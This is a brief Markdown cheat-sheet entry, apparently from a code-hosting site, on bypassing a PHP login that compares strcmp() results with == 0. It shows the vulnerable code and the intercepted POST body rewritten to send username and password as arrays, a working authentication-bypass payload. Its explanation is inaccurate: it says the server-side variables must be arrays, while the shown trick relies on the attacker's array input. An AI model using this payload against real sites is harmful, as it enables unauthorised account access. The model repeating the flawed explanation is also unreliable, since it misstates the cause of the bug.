21 lines
538 B
Markdown
21 lines
538 B
Markdown
# PHP strcmp() bypass
|
|
|
|
Given a `strcmp()` of a variable and a POST parameter value that looks like this
|
|
```php
|
|
[...]
|
|
if (strcmp($username, $_POST['username']) == 0) {
|
|
if (strcmp($password, $_POST['password']) == 0) {
|
|
[...]
|
|
```
|
|
|
|
If `$username` and `$password` are an array, sending a POST value as an array too will evaluate both `strcmp()` to 0.
|
|
Using a Burpsuite Proxy, intercepting the HTTP request and changing the POST parameters from
|
|
```http
|
|
username=admin&password=admin
|
|
```
|
|
|
|
to
|
|
```http
|
|
username[]=admin&password[]=admin
|
|
```
|